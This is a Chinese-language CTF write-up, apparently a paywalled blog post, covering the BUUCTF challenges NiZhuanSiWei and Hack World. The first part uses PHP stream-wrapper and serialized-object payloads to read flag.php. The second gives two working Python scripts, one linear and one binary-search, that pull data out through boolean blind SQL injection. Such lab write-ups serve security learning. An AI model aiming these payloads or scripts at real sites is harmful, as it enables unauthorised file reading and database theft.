本文总结了多个CTF挑战,包括NiZhuanSiWei的PHP序列化漏洞,Hack World的布尔盲注,Fakebook的SSRF,hardsql的报错注入,Baby Sqli的联合查询,areuserialz的代码执行,BlackList的SQL注入,easy java的文件读取,Online Tool的命令注入,以及多种解谜技巧。
buuctf总结
NiZhuanSiWei
主页是一段php代码,审计:
有file_get_content(),可以利用伪协议写入‘welcome to the zjctf '过判断;
同时看到提示有useless.php ,可以利用include()读一下文件
构造payload:
?text=data:text/plain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
得到base64源码:
解码审计:
<?php
class Flag{
//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
构造序列化:
$a=new Flag();
$a->file = 'flag.php' ;
echo serialize($a);
得到最终payload:
?text=data:text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
结果在源码里
Hack World
通过简单测试和标题描述,是要从flag表中的flag列获取flag,页面不会返回数据,只会做判断,可以利用布尔盲注
存在过滤,先进行fuzz测试:
过滤字符没什么影响,写脚本跑吧(先上自己写的,速度贼慢):
import requests
url = "http://4bdb6890-2aed-4cc5-8d6f-e0c6621b6fa8.node3.buuoj.cn/index.php"
flag = ''
for i in range(1,50):
for j in range(41,126):
payload = {
"id":'(ascii(substr((select(flag)from(flag)),%d,1))=%d)'%(i,j)}
output = requests.post(url=url,data=payload)
if "Hello" in output.text:
flag += chr(j)
break
print(flag)
二分法速度快多了:
import requests
import time
url = "http://4bdb6890-2aed-4cc5-8d6f-e0c6621b6fa8.node3.buuoj.cn/index.php"
temp = {
"id" : ""}
flag = ""
for i in range(1,1000):
time.sleep(0.06)
low = 32
high =128
mid = (low+high)//2
while(low<high):
temp["id"] = "(ascii(substr((select(flag)from(flag)),%d,1))>%d)" %(i,mid)
r = requests.post(url,data=temp)
print(low,high,mid,":")
if "Hello" in r.text:
low = mid+1
else:
high = mid
mid =(low+high)//2
if(mid ==32 or mid ==127):
break
flag +=chr(mid)
print(flag)
print("flag=" ,flag)
最低0.47元/天 解锁文章
扫一扫
5192
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
